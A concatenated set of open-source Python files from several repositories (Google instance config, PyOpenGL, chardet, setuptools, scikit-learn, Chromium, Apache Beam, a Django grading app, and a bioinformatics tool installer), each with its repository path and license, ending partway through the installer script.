self.instance_config_script, self.instance_config_template)
# User provided instance configs should always take precedence.
super(InstanceConfig, self).__init__(
config_file=self.instance_config_template,
config_header=self.instance_config_header)
# Use the instance config settings from metadata if specified. Then use
# settings in an instance config file if one exists. If a config
# file does not already exist, try to use the distro provided defaults. If
# no file exists, use the default configuration settings.
config_files = [self.instance_config, self.instance_config_distro]
config_defaults = []
if self.instance_config_metadata:
config = parser.Parser()
try:
config.read_file(stringio.StringIO(self.instance_config_metadata))
except parser.Error as e:
self.logger.error('Error parsing metadata configs: %s', str(e))
else:
config_defaults.append(
dict((s, dict(config.items(s))) for s in config.sections()))
for config_file in config_files:
if os.path.exists(config_file):
config = parser.Parser()
try:
config.read(config_file)
except parser.Error as e:
self.logger.error('Error parsing config file: %s', str(e))
else:
config_defaults.append(
dict((s, dict(config.items(s))) for s in config.sections()))
config_defaults.append(self.instance_config_options)
for defaults in config_defaults:
for section, options in sorted(defaults.items()):
for option, value in sorted(options.items()):
super(InstanceConfig, self).SetOption(
section, option, value, overwrite=False)
def WriteConfig(self):
"""Write the config values to the instance defaults file."""
super(InstanceConfig, self).WriteConfig(config_file=self.instance_config)
| apache-2.0 |
mwmuni/LIGGGHTS_GUI | OpenGL/GL/APPLE/flush_buffer_range.py | 9 | 1911 | '''OpenGL extension APPLE.flush_buffer_range
This module customises the behaviour of the
OpenGL.raw.GL.APPLE.flush_buffer_range to provide a more
Python-friendly API
Overview (from the spec)
APPLE_flush_buffer_range expands the buffer object API to allow greater
performance when a client application only needs to write to a sub-range
of a buffer object. To that end, this extension introduces two new buffer
object features: non-serialized buffer modification and explicit sub-range
flushing for mapped buffer objects.
OpenGL requires that commands occur in a FIFO manner meaning that any
changes to buffer objects either block until the data has been processed by
the OpenGL pipeline or else create extra copies to avoid such a block. By
providing a method to asynchronously modify buffer object data, an
application is then able to manage the synchronization points themselves
and modify ranges of data contained by a buffer object even though OpenGL
might still be using other parts of it.
This extension also provides a method for explicitly flushing ranges of a
mapped buffer object so OpenGL does not have to assume that the entire
range may have been modified.
Affects ARB_vertex_buffer_object, ARB_pixel_buffer_object and OpenGL 1.5
Buffer Objects.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/APPLE/flush_buffer_range.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.APPLE.flush_buffer_range import *
from OpenGL.raw.GL.APPLE.flush_buffer_range import _EXTENSION_NAME
def glInitFlushBufferRangeAPPLE():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION | gpl-3.0 |
MQQiang/kbengine | kbe/res/scripts/common/Lib/site-packages/pip/_vendor/requests/packages/chardet/constants.py | 3008 | 1335 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
_debug = 0
eDetecting = 0
eFoundIt = 1
eNotMe = 2
eStart = 0
eError = 1
eItsMe = 2
SHORTCUT_THRESHOLD = 0.95
| lgpl-3.0 |
compiteing/flask-ponypermission | venv/lib/python2.7/site-packages/setuptools/depends.py | 462 | 6370 | import sys
import imp
import marshal
from imp import PKG_DIRECTORY, PY_COMPILED, PY_SOURCE, PY_FROZEN
from distutils.version import StrictVersion
from setuptools import compat
__all__ = [
'Require', 'find_module', 'get_module_constant', 'extract_constant'
]
class Require:
"""A prerequisite to building or installing a distribution"""
def __init__(self, name, requested_version, module, homepage='',
attribute=None, format=None):
if format is None and requested_version is not None:
format = StrictVersion
if format is not None:
requested_version = format(requested_version)
if attribute is None:
attribute = '__version__'
self.__dict__.update(locals())
del self.self
def full_name(self):
"""Return full package/distribution name, w/version"""
if self.requested_version is not None:
return '%s-%s' % (self.name,self.requested_version)
return self.name
def version_ok(self, version):
"""Is 'version' sufficiently up-to-date?"""
return self.attribute is None or self.format is None or \
str(version) != "unknown" and version >= self.requested_version
def get_version(self, paths=None, default="unknown"):
"""Get version number of installed module, 'None', or 'default'
Search 'paths' for module. If not found, return 'None'. If found,
return the extracted version attribute, or 'default' if no version
attribute was specified, or the value cannot be determined without
importing the module. The version is formatted according to the
requirement's version format (if any), unless it is 'None' or the
supplied 'default'.
"""
if self.attribute is None:
try:
f,p,i = find_module(self.module,paths)
if f: f.close()
return default
except ImportError:
return None
v = get_module_constant(self.module, self.attribute, default, paths)
if v is not None and v is not default and self.format is not None:
return self.format(v)
return v
def is_present(self, paths=None):
"""Return true if dependency is present on 'paths'"""
return self.get_version(paths) is not None
def is_current(self, paths=None):
"""Return true if dependency is present and up-to-date on 'paths'"""
version = self.get_version(paths)
if version is None:
return False
return self.version_ok(version)
def _iter_code(code):
"""Yield '(op,arg)' pair for each operation in code object 'code'"""
from array import array
from dis import HAVE_ARGUMENT, EXTENDED_ARG
bytes = array('b',code.co_code)
eof = len(code.co_code)
ptr = 0
extended_arg = 0
while ptr<eof:
op = bytes[ptr]
if op>=HAVE_ARGUMENT:
arg = bytes[ptr+1] + bytes[ptr+2]*256 + extended_arg
ptr += 3
if op==EXTENDED_ARG:
extended_arg = arg * compat.long_type(65536)
continue
else:
arg = None
ptr += 1
yield op,arg
def find_module(module, paths=None):
"""Just like 'imp.find_module()', but with package support"""
parts = module.split('.')
while parts:
part = parts.pop(0)
f, path, (suffix,mode,kind) = info = imp.find_module(part, paths)
if kind==PKG_DIRECTORY:
parts = parts or ['__init__']
paths = [path]
elif parts:
raise ImportError("Can't find %r in %s" % (parts,module))
return info
def get_module_constant(module, symbol, default=-1, paths=None):
"""Find 'module' by searching 'paths', and extract 'symbol'
Return 'None' if 'module' does not exist on 'paths', or it does not define
'symbol'. If the module defines 'symbol' as a constant, return the
constant. Otherwise, return 'default'."""
try:
f, path, (suffix, mode, kind) = find_module(module, paths)
except ImportError:
# Module doesn't exist
return None
try:
if kind==PY_COMPILED:
f.read(8) # skip magic & date
code = marshal.load(f)
elif kind==PY_FROZEN:
code = imp.get_frozen_object(module)
elif kind==PY_SOURCE:
code = compile(f.read(), path, 'exec')
else:
# Not something we can parse; we'll have to import it. :(
if module not in sys.modules:
imp.load_module(module, f, path, (suffix, mode, kind))
return getattr(sys.modules[module], symbol, None)
finally:
if f:
f.close()
return extract_constant(code, symbol, default)
def extract_constant(code, symbol, default=-1):
"""Extract the constant value of 'symbol' from 'code'
If the name 'symbol' is bound to a constant value by the Python code
object 'code', return that value. If 'symbol' is bound to an expression,
return 'default'. Otherwise, return 'None'.
Return value is based on the first assignment to 'symbol'. 'symbol' must
be a global, or at least a non-"fast" local in the code block. That is,
only 'STORE_NAME' and 'STORE_GLOBAL' opcodes are checked, and 'symbol'
must be present in 'code.co_names'.
"""
if symbol not in code.co_names:
# name's not there, can't possibly be an assigment
return None
name_idx = list(code.co_names).index(symbol)
STORE_NAME = 90
STORE_GLOBAL = 97
LOAD_CONST = 100
const = default
for op, arg in _iter_code(code):
if op==LOAD_CONST:
const = code.co_consts[arg]
elif arg==name_idx and (op==STORE_NAME or op==STORE_GLOBAL):
return const
else:
const = default
def _update_globals():
"""
Patch the globals to remove the objects not available on some platforms.
XXX it'd be better to test assertions about bytecode instead.
"""
if not sys.platform.startswith('java') and sys.platform != 'cli':
return
incompatible = 'extract_constant', 'get_module_constant'
for name in incompatible:
del globals()[name]
__all__.remove(name)
_update_globals()
| mit |
mehdidc/scikit-learn | examples/gaussian_process/plot_gp_regression.py | 253 | 4054 | #!/usr/bin/python
# -*- coding: utf-8 -*-
r"""
=========================================================
Gaussian Processes regression: basic introductory example
=========================================================
A simple one-dimensional regression exercise computed in two different ways:
1. A noise-free case with a cubic correlation model
2. A noisy case with a squared Euclidean correlation model
In both cases, the model parameters are estimated using the maximum
likelihood principle.
The figures illustrate the interpolating property of the Gaussian Process
model as well as its probabilistic nature in the form of a pointwise 95%
confidence interval.
Note that the parameter ``nugget`` is applied as a Tikhonov regularization
of the assumed covariance between the training points. In the special case
of the squared euclidean correlation model, nugget is mathematically equivalent
to a normalized variance: That is
.. math::
\mathrm{nugget}_i = \left[\frac{\sigma_i}{y_i}\right]^2
"""
print(__doc__)
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# Jake Vanderplas <vanderplas@astro.washington.edu>
# Licence: BSD 3 clause
import numpy as np
from sklearn.gaussian_process import GaussianProcess
from matplotlib import pyplot as pl
np.random.seed(1)
def f(x):
"""The function to predict."""
return x * np.sin(x)
#----------------------------------------------------------------------
# First the noiseless case
X = np.atleast_2d([1., 3., 5., 6., 7., 8.]).T
# Observations
y = f(X).ravel()
# Mesh the input space for evaluations of the real function, the prediction and
# its MSE
x = np.atleast_2d(np.linspace(0, 10, 1000)).T
# Instanciate a Gaussian Process model
gp = GaussianProcess(corr='cubic', theta0=1e-2, thetaL=1e-4, thetaU=1e-1,
random_start=100)
# Fit to data using Maximum Likelihood Estimation of the parameters
gp.fit(X, y)
# Make the prediction on the meshed x-axis (ask for MSE as well)
y_pred, MSE = gp.predict(x, eval_MSE=True)
sigma = np.sqrt(MSE)
# Plot the function, the prediction and the 95% confidence interval based on
# the MSE
fig = pl.figure()
pl.plot(x, f(x), 'r:', label=u'$f(x) = x\,\sin(x)$')
pl.plot(X, y, 'r.', markersize=10, label=u'Observations')
pl.plot(x, y_pred, 'b-', label=u'Prediction')
pl.fill(np.concatenate([x, x[::-1]]),
np.concatenate([y_pred - 1.9600 * sigma,
(y_pred + 1.9600 * sigma)[::-1]]),
alpha=.5, fc='b', ec='None', label='95% confidence interval')
pl.xlabel('$x$')
pl.ylabel('$f(x)$')
pl.ylim(-10, 20)
pl.legend(loc='upper left')
#----------------------------------------------------------------------
# now the noisy case
X = np.linspace(0.1, 9.9, 20)
X = np.atleast_2d(X).T
# Observations and noise
y = f(X).ravel()
dy = 0.5 + 1.0 * np.random.random(y.shape)
noise = np.random.normal(0, dy)
y += noise
# Mesh the input space for evaluations of the real function, the prediction and
# its MSE
x = np.atleast_2d(np.linspace(0, 10, 1000)).T
# Instanciate a Gaussian Process model
gp = GaussianProcess(corr='squared_exponential', theta0=1e-1,
thetaL=1e-3, thetaU=1,
nugget=(dy / y) ** 2,
random_start=100)
# Fit to data using Maximum Likelihood Estimation of the parameters
gp.fit(X, y)
# Make the prediction on the meshed x-axis (ask for MSE as well)
y_pred, MSE = gp.predict(x, eval_MSE=True)
sigma = np.sqrt(MSE)
# Plot the function, the prediction and the 95% confidence interval based on
# the MSE
fig = pl.figure()
pl.plot(x, f(x), 'r:', label=u'$f(x) = x\,\sin(x)$')
pl.errorbar(X.ravel(), y, dy, fmt='r.', markersize=10, label=u'Observations')
pl.plot(x, y_pred, 'b-', label=u'Prediction')
pl.fill(np.concatenate([x, x[::-1]]),
np.concatenate([y_pred - 1.9600 * sigma,
(y_pred + 1.9600 * sigma)[::-1]]),
alpha=.5, fc='b', ec='None', label='95% confidence interval')
pl.xlabel('$x$')
pl.ylabel('$f(x)$')
pl.ylim(-10, 20)
pl.legend(loc='upper left')
pl.show()
| bsd-3-clause |
AICP/external_chromium_org | tools/json_schema_compiler/ppapi_generator.py | 37 | 10976 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import datetime
import os.path
import sys
import code
import cpp_util
import model
try:
import jinja2
except ImportError:
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..',
'third_party'))
import jinja2
class _PpapiGeneratorBase(object):
"""A base class for ppapi generators.
Implementations should set TEMPLATE_NAME to a string containing the name of
the template file without its extension. The template will be rendered with
the following symbols available:
name: A string containing the name of the namespace.
enums: A list of enums within the namespace.
types: A list of types within the namespace, sorted such that no element
depends on an earlier element.
events: A dict of events within the namespace.
functions: A dict of functions within the namespace.
year: An int containing the current year.
source_file: The name of the input file.
"""
def __init__(self, namespace):
self._namespace = namespace
self._required_types = {}
self._array_types = set()
self._optional_types = set()
self._optional_array_types = set()
self._dependencies = collections.OrderedDict()
self._types = []
self._enums = []
self.jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__),
'templates', 'ppapi')))
self._SetupFilters()
self._ResolveTypeDependencies()
def _SetupFilters(self):
self.jinja_environment.filters.update({
'ppapi_type': self.ToPpapiType,
'classname': cpp_util.Classname,
'enum_value': self.EnumValueName,
'return_type': self.GetFunctionReturnType,
'format_param_type': self.FormatParamType,
'needs_optional': self.NeedsOptional,
'needs_array': self.NeedsArray,
'needs_optional_array': self.NeedsOptionalArray,
'has_array_outs': self.HasArrayOuts,
})
def Render(self, template_name, values):
generated_code = code.Code()
template = self.jinja_environment.get_template(
'%s.template' % template_name)
generated_code.Append(template.render(values))
return generated_code
def Generate(self):
"""Generates a Code object for a single namespace."""
return self.Render(self.TEMPLATE_NAME, {
'name': self._namespace.name,
'enums': self._enums,
'types': self._types,
'events': self._namespace.events,
'functions': self._namespace.functions,
# TODO(sammc): Don't change years when regenerating existing output files.
'year': datetime.date.today().year,
'source_file': self._namespace.source_file,
})
def _ResolveTypeDependencies(self):
"""Calculates the transitive closure of the types in _required_types.
Returns a tuple containing the list of struct types and the list of enum
types. The list of struct types is ordered such that no type depends on a
type later in the list.
"""
if self._namespace.functions:
for function in self._namespace.functions.itervalues():
self._FindFunctionDependencies(function)
if self._namespace.events:
for event in self._namespace.events.itervalues():
self._FindFunctionDependencies(event)
resolved_types = set()
while resolved_types < set(self._required_types):
for typename in sorted(set(self._required_types) - resolved_types):
type_ = self._required_types[typename]
self._dependencies.setdefault(typename, set())
for member in type_.properties.itervalues():
self._RegisterDependency(member, self._NameComponents(type_))
resolved_types.add(typename)
while self._dependencies:
for name, deps in self._dependencies.items():
if not deps:
if (self._required_types[name].property_type ==
model.PropertyType.ENUM):
self._enums.append(self._required_types[name])
else:
self._types.append(self._required_types[name])
for deps in self._dependencies.itervalues():
deps.discard(name)
del self._dependencies[name]
break
else:
raise ValueError('Circular dependency %s' % self._dependencies)
def _FindFunctionDependencies(self, function):
for param in function.params:
self._RegisterDependency(param, None)
if function.callback:
for param in function.callback.params:
self._RegisterDependency(param, None)
if function.returns:
self._RegisterTypeDependency(function.returns, None, False, False)
def _RegisterDependency(self, member, depender):
self._RegisterTypeDependency(member.type_, depender, member.optional, False)
def _RegisterTypeDependency(self, type_, depender, optional, array):
if type_.property_type == model.PropertyType.ARRAY:
self._RegisterTypeDependency(type_.item_type, depender, optional, True)
elif type_.property_type == model.PropertyType.REF:
self._RegisterTypeDependency(self._namespace.types[type_.ref_type],
depender, optional, array)
elif type_.property_type in (model.PropertyType.OBJECT,
model.PropertyType.ENUM):
name_components = self._NameComponents(type_)
self._required_types[name_components] = type_
if depender:
self._dependencies.setdefault(depender, set()).add(
name_components)
if array:
self._array_types.add(name_components)
if optional:
self._optional_array_types.add(name_components)
elif optional:
self._optional_types.add(name_components)
@staticmethod
def _NameComponents(entity):
"""Returns a tuple of the fully-qualified name of an entity."""
names = []
while entity:
if (not isinstance(entity, model.Type) or
entity.property_type != model.PropertyType.ARRAY):
names.append(entity.name)
entity = entity.parent
return tuple(reversed(names[:-1]))
def ToPpapiType(self, type_, array=False, optional=False):
"""Returns a string containing the name of the Pepper C type for |type_|.
If array is True, returns the name of an array of |type_|. If optional is
True, returns the name of an optional |type_|. If both array and optional
are True, returns the name of an optional array of |type_|.
"""
if isinstance(type_, model.Function) or type_.property_type in (
model.PropertyType.OBJECT, model.PropertyType.ENUM):
return self._FormatPpapiTypeName(
array, optional, '_'.join(
cpp_util.Classname(s) for s in self._NameComponents(type_)),
namespace=cpp_util.Classname(self._namespace.name))
elif type_.property_type == model.PropertyType.REF:
return self.ToPpapiType(self._namespace.types[type_.ref_type],
optional=optional, array=array)
elif type_.property_type == model.PropertyType.ARRAY:
return self.ToPpapiType(type_.item_type, array=True,
optional=optional)
elif type_.property_type == model.PropertyType.STRING and not array:
return 'PP_Var'
elif array or optional:
if type_.property_type in self._PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP:
return self._FormatPpapiTypeName(
array, optional,
self._PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP[type_.property_type], '')
return self._PPAPI_PRIMITIVE_TYPE_MAP.get(type_.property_type, 'PP_Var')
_PPAPI_PRIMITIVE_TYPE_MAP = {
model.PropertyType.BOOLEAN: 'PP_Bool',
model.PropertyType.DOUBLE: 'double_t',
model.PropertyType.INT64: 'int64_t',
model.PropertyType.INTEGER: 'int32_t',
}
_PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP = {
model.PropertyType.BOOLEAN: 'Bool',
model.PropertyType.DOUBLE: 'Double',
model.PropertyType.INT64: 'Int64',
model.PropertyType.INTEGER: 'Int32',
model.PropertyType.STRING: 'String',
}
@staticmethod
def _FormatPpapiTypeName(array, optional, name, namespace=''):
if namespace:
namespace = '%s_' % namespace
if array:
if optional:
return 'PP_%sOptional_%s_Array' % (namespace, name)
return 'PP_%s%s_Array' % (namespace, name)
if optional:
return 'PP_%sOptional_%s' % (namespace, name)
return 'PP_%s%s' % (namespace, name)
def NeedsOptional(self, type_):
"""Returns True if an optional |type_| is required."""
return self._NameComponents(type_) in self._optional_types
def NeedsArray(self, type_):
"""Returns True if an array of |type_| is required."""
return self._NameComponents(type_) in self._array_types
def NeedsOptionalArray(self, type_):
"""Returns True if an optional array of |type_| is required."""
return self._NameComponents(type_) in self._optional_array_types
def FormatParamType(self, param):
"""Formats the type of a parameter or property."""
return self.ToPpapiType(param.type_, optional=param.optional)
@staticmethod
def GetFunctionReturnType(function):
return 'int32_t' if function.callback or function.returns else 'void'
def EnumValueName(self, enum_value, enum_type):
"""Returns a string containing the name for an enum value."""
return '%s_%s' % (self.ToPpapiType(enum_type).upper(),
enum_value.name.upper())
def _ResolveType(self, type_):
if type_.property_type == model.PropertyType.REF:
return self._ResolveType(self._namespace.types[type_.ref_type])
if type_.property_type == model.PropertyType.ARRAY:
return self._ResolveType(type_.item_type)
return type_
def _IsOrContainsArray(self, type_):
if type_.property_type == model.PropertyType.ARRAY:
return True
type_ = self._ResolveType(type_)
if type_.property_type == model.PropertyType.OBJECT:
return any(self._IsOrContainsArray(param.type_)
for param in type_.properties.itervalues())
return False
def HasArrayOuts(self, function):
"""Returns True if the function produces any arrays as outputs.
This includes arrays that are properties of other objects.
"""
if function.callback:
for param in function.callback.params:
if self._IsOrContainsArray(param.type_):
return True
return function.returns and self._IsOrContainsArray(function.returns)
class _IdlGenerator(_PpapiGeneratorBase):
TEMPLATE_NAME = 'idl'
class _GeneratorWrapper(object):
def __init__(self, generator_factory):
self._generator_factory = generator_factory
def Generate(self, namespace):
return self._generator_factory(namespace).Generate()
class PpapiGenerator(object):
def __init__(self):
self.idl_generator = _GeneratorWrapper(_IdlGenerator)
| bsd-3-clause |
axbaretto/beam | sdks/python/apache_beam/runners/worker/statesampler.py | 5 | 5922 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This module is experimental. No backwards-compatibility guarantees.
# pytype: skip-file
import contextlib
import threading
from typing import TYPE_CHECKING
from typing import Dict
from typing import NamedTuple
from typing import Optional
from typing import Union
from apache_beam.runners import common
from apache_beam.utils.counters import Counter
from apache_beam.utils.counters import CounterFactory
from apache_beam.utils.counters import CounterName
try:
from apache_beam.runners.worker import statesampler_fast as statesampler_impl # type: ignore
FAST_SAMPLER = True
except ImportError:
from apache_beam.runners.worker import statesampler_slow as statesampler_impl
FAST_SAMPLER = False
if TYPE_CHECKING:
from apache_beam.metrics.execution import MetricsContainer
_STATE_SAMPLERS = threading.local()
def set_current_tracker(tracker):
_STATE_SAMPLERS.tracker = tracker
def get_current_tracker():
try:
return _STATE_SAMPLERS.tracker
except AttributeError:
return None
_INSTRUCTION_IDS = threading.local()
def get_current_instruction_id():
try:
return _INSTRUCTION_IDS.instruction_id
except AttributeError:
return None
@contextlib.contextmanager
def instruction_id(id):
try:
_INSTRUCTION_IDS.instruction_id = id
yield
finally:
_INSTRUCTION_IDS.instruction_id = None
def for_test():
set_current_tracker(StateSampler('test', CounterFactory()))
return get_current_tracker()
StateSamplerInfo = NamedTuple(
'StateSamplerInfo',
[('state_name', CounterName), ('transition_count', int),
('time_since_transition', int),
('tracked_thread', Optional[threading.Thread])])
# Default period for sampling current state of pipeline execution.
DEFAULT_SAMPLING_PERIOD_MS = 200
class StateSampler(statesampler_impl.StateSampler):
def __init__(self,
prefix, # type: str
counter_factory,
sampling_period_ms=DEFAULT_SAMPLING_PERIOD_MS):
self._prefix = prefix
self._counter_factory = counter_factory
self._states_by_name = {
} # type: Dict[CounterName, statesampler_impl.ScopedState]
self.sampling_period_ms = sampling_period_ms
self.tracked_thread = None # type: Optional[threading.Thread]
self.finished = False
self.started = False
super(StateSampler, self).__init__(sampling_period_ms)
@property
def stage_name(self):
# type: () -> str
return self._prefix
def stop(self):
# type: () -> None
set_current_tracker(None)
super(StateSampler, self).stop()
def stop_if_still_running(self):
# type: () -> None
if self.started and not self.finished:
self.stop()
def start(self):
# type: () -> None
self.tracked_thread = threading.current_thread()
set_current_tracker(self)
super(StateSampler, self).start()
self.started = True
def get_info(self):
# type: () -> StateSamplerInfo
"""Returns StateSamplerInfo with transition statistics."""
return StateSamplerInfo(
self.current_state().name,
self.state_transition_count,
self.time_since_transition,
self.tracked_thread)
def scoped_state(self,
name_context, # type: Union[str, common.NameContext]
state_name, # type: str
io_target=None,
metrics_container=None # type: Optional[MetricsContainer]
):
# type: (...) -> statesampler_impl.ScopedState
"""Returns a ScopedState object associated to a Step and a State.
Args:
name_context: common.NameContext. It is the step name information.
state_name: str. It is the state name (e.g. process / start / finish).
io_target:
metrics_container: MetricsContainer. The step's metrics container.
Returns:
A ScopedState that keeps the execution context and is able to switch it
for the execution thread.
"""
if not isinstance(name_context, common.NameContext):
name_context = common.NameContext(name_context)
counter_name = CounterName(
state_name + '-msecs',
stage_name=self._prefix,
step_name=name_context.metrics_name(),
io_target=io_target)
if counter_name in self._states_by_name:
return self._states_by_name[counter_name]
else:
output_counter = self._counter_factory.get_counter(
counter_name, Counter.SUM)
self._states_by_name[counter_name] = super(StateSampler,
self)._scoped_state(
counter_name,
name_context,
output_counter,
metrics_container)
return self._states_by_name[counter_name]
def commit_counters(self):
# type: () -> None
"""Updates output counters with latest state statistics."""
for state in self._states_by_name.values():
state_msecs = int(1e-6 * state.nsecs)
state.counter.update(state_msecs - state.counter.value())
| apache-2.0 |
lohner/Praktomat | src/tasks/views.py | 1 | 5082 | # -*- coding: utf-8 -*-
import tempfile
import zipfile
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.shortcuts import render, get_object_or_404
from django.http import Http404
from django.http import HttpResponseRedirect, HttpResponse
from datetime import datetime
from django import forms
from django.core import urlresolvers
from django.contrib import messages
import django.utils.timezone
from tasks.models import Task
from solutions.forms import ModelSolutionFormSet
from solutions.models import Solution, SolutionFile
from accounts.models import User
from accounts.views import access_denied
from attestation.models import Attestation
from attestation.views import user_task_attestation_map
from configuration import get_settings
@login_required
def taskList(request):
now = django.utils.timezone.now()
tasks = Task.objects.filter(publication_date__lte = now).order_by('submission_date')
expired_Tasks = Task.objects.filter(submission_date__lt = now).order_by('publication_date','submission_date')
try:
tutors = request.user.tutorial.tutors.all()
except:
tutors = None
trainers = User.objects.filter(groups__name="Trainer")
# we only have a single user here, so the rating_list only contains a single row;
# this row belongs to that user
(_,attestations,threshold,calculated_grade) = user_task_attestation_map([request.user], tasks)[0]
attestations = map(lambda a, b: (a,)+b, tasks, attestations)
def tasksWithSolutions(tasks):
return map(lambda t: (t, t.final_solution(request.user)), tasks)
return render(request,
'tasks/task_list.html',
{
'tasks':tasksWithSolutions(tasks),
'expired_tasks': tasksWithSolutions(expired_Tasks),
'attestations':attestations,
'show_final_grade': get_settings().final_grades_published,
'tutors':tutors,
'trainers':trainers,
'threshold':threshold,
'calculated_grade':calculated_grade,
})
@login_required
def taskDetail(request,task_id):
task = get_object_or_404(Task,pk=task_id)
if task.publication_date >= datetime.now() and not request.user.is_trainer:
raise Http404
my_solutions = Task.objects.get(pk=task_id).solution_set.filter(author = request.user)
return render(request,
'tasks/task_detail.html',
{
'task': task,
'solutions': my_solutions,
})
class ImportForm(forms.Form):
file = forms.FileField()
@staff_member_required
def import_tasks(request):
""" View in the admin """
if request.method == 'POST':
form = ImportForm(request.POST, request.FILES)
if form.is_valid():
try:
Task.import_Tasks(form.files['file'], request.user)
messages.success(request, "The import was successfull.")
return HttpResponseRedirect(urlresolvers.reverse('admin:tasks_task_changelist'))
except Exception, e:
from django.forms.utils import ErrorList
msg = "An Error occured. The import file was propably malformed.: %s" % str(e)
form._errors["file"] = ErrorList([msg])
else:
form = ImportForm()
return render(request, 'admin/tasks/task/import.html', {'form': form, 'title':"Import Task" })
@staff_member_required
def download_final_solutions(request, task_id):
""" download all final solutions of a task from the admin interface """
zip_file = tempfile.SpooledTemporaryFile()
zip = zipfile.ZipFile(zip_file,'w')
for solution_file in SolutionFile.objects.filter(solution__task=task_id):
if solution_file.solution.final:
zip.write(solution_file.file.path, solution_file.file.name)
zip.close()
zip_file.seek(0)
response = HttpResponse(zip_file.read(), content_type="application/zip")
response['Content-Disposition'] = 'attachment; filename=FinalSolutions.zip'
return response
@staff_member_required
def model_solution(request, task_id):
""" View in the admin """
task = get_object_or_404(Task,pk=task_id)
if request.method == "POST":
solution = Solution(task = task, author=request.user)
formset = ModelSolutionFormSet(request.POST, request.FILES, instance=solution)
if formset.is_valid():
try:
solution.save();
# no deleting the old solution:
# delete will cascade on db level deleting checker results and checker
# as this isn't easily prevented just keep the old solution around until the task is deleted
formset.save()
solution.check_solution(request.session)
task.model_solution = solution;
task.save()
except:
solution.delete() # delete files
raise # dont commit db changes
else:
formset = ModelSolutionFormSet()
context = {"formset": formset, "task": task, 'title': "Model Solution", 'is_popup': True, }
return render(request, "admin/tasks/task/model_solution.html", context)
| gpl-2.0 |
SchulzLab/SOS | install_script.py | 1 | 11581 | #!/usr/bin/env python
import os
from optparse import OptionParser
import subprocess
import sys
#import commands
class install_script():
def __init__(self):
self.prog_installed = []
def obtaining_tar(self, prog, path):
if (prog == 6):
os.chdir(path)
#Before obtaining tha tar file of the corresponding tool, we always check whether the folder exists in the path. If it exists then we throw an exception otherwise we download the tool
#Checking and downloading oases
chk = self.checkfolder("oases")
if(chk == False):
os.system("git clone --recursive http://github.com/dzerbino/oases.git")
else:
print ("The path already contains a folder named oases. Please rename the folder or remove it from the path")
sys.exit()
#Checking and downloading SEECER. This is not the version mentioned in the manuscript of SEECER. This is the modified version which was used for the SOS manuscript.
chk1 = self.checkfolder("SEECER.tar.gz")
if(chk1 == False):
os.system("wget https://zenodo.org/record/3686150/files/SEECER.tar.gz?download=1")
os.system("tar -zxvf SEECER.tar.gz")
else:
print ("The path already contains a folder named SEECER.tar.gz. Please rename it or remove it from the path")
#Checking and downloading salmon
chk2 = self.checkfolder("salmon-1.1.0_linux_x86_64.tar.gz")
if(chk2 == False):
#To get the latest version of salmon, please change the link in the next three lines
print("-----salmon installation-------")
os.system("wget https://github.com/COMBINE-lab/salmon/releases/download/v1.1.0/salmon-1.1.0_linux_x86_64.tar.gz >"+path+"/LogFiles/salmon.txt 2> "+path+"/LogFiles/salmonError.txt")
os.system("tar -zxvf salmon-1.1.0_linux_x86_64.tar.gz >"+path+"/LogFiles/salmon.txt 2> "+path+"/LogFiles/salmonError.txt")
self.prog_installed.append(path+"/salmon-1.1.0_linux_x86_64.tar.gz")
else:
print ("The path already contains a folder named salmon-1.1.0_linux_x86_64.tar.gz. Please rename it or remove it from the path")
sys.exit()
chk3 = self.checkfolder("ORNA")
if(chk3 == False):
os.system("git clone https://github.com/SchulzLab/ORNA")
self.prog_installed.append(path+"/ORNA")
else:
print ("The path already contains a folder named ORNA. Please rename it or remove it from the path")
chk4 = self.checkfolder("KREATION")
if(chk4 == False):
print("-----KREATION installation-------")
os.system("git clone https://github.com/SchulzLab/KREATION >"+path+"/LogFiles/KREATION.txt 2> "+path+"/LogFiles/KreationError.txt")
self.prog_installed.append(path+"/KREATION")
else:
print ("The path already contains a folder named KREATION. Please rename it or remove it from the path")
if(prog==1):
os.chdir(path)
chk6 = self.checkfolder("oases")
if(chk6 == False):
os.system("git clone http://github.com/dzerbino/oases.git >"+path+"/LogFiles/Oases.txt 2> "+path+"/LogFiles/OasesError.txt")
else:
print ("The path already contains a folder named oases. please rename the folder or remove it from the path")
sys.exit()
if(prog==2):
